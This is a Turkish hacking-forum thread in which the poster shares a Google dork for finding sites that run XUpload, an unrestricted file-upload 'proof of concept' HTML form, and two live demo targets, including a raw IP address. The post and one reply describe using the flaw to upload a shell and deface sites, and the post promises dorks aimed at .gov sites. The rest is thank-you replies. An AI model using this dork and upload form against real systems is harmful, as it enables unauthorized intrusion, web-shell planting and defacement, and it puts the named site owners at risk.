Exploit XUpload Dork / Her Kes Hack Yapsin...

Merhaba Yeni Cikan Dork Bu Iyi Heyklemeler Her Kese.. Yakinda Iyi Videolar Olacak .gov Ile Alakali Dorklar.

XUpload Uzaktan Dosya Yükleme Güvenlik Açığı 2020.11.04 Risk: Yüksek Yerel: Hayır Uzaktan: Evet CVE: Yok CWE: CWE-434 Dork: intext: "XUpload Tarafından Desteklenmektedir" # Başlık: XUpload Uzaktan Dosya Yükleme Güvenlik Açığı # tarih: 2020-11-04 # Üzerinde test edildi: Windows 10 ve Google Chrome # Kategori: Web Uygulama Hataları # Dork: intext: "XUpload Tarafından Desteklenmektedir" ### NOT: * Kabuğunuzu yüklemek veya tahrif etmek için atlayabilirsiniz. ### POC: * Exploit 1: site.com/[folder]/[file] <form enctype = "multipart / form-data" action = "/ cgi-bin / upload.cgi? upload_id =" method = "post" onSubmit = "return StartUpload (this);" target = "xupload"> Dosya gönder: <input name = "file_1" type = "file" onChange = "checkExt (this.value)"> <br> Yorum: <input type = "text" name = "comment"> (isteğe bağlı) <br> <br> <Input type = "checkbox" name = "popup"> <label FOR = "popup" ACCESSKEY = "Z"> Yükleme durumunu açılır pencerede göster </label> <br> <br> <input type = "submit" value = "Dosya Yükle"> </form> ### Demo: * http://www.satyrlp.sorokine.fr * http://50.116.78.206/uploadtest/upload_form.html

 

Eline sağlık reis

 

Eline emegine saglik Taleh

 

Güzel gerekliydi deneyelim bakalım, teşekkürler.

 

Eyw reis bende ariyordum

 

Bu ne anlatacak var mı

 

Güzel gerekliydi deneyelim bakalım, teşekkürler.

Eyv Bakariz Tabii

 

Bu ne anlatacak var mı

Bu bi dork qardas web sitede olan cms yuklulerin bosluklarini ariyoraun bulup shell atip index yediriyon bu gibi yani. Ayrica yeniysense arastir forumu ilgili konular vardir bi suru

 

Eyw aga

 

EMEĞİNE SAĞLIK DOSTUM

 

Bklm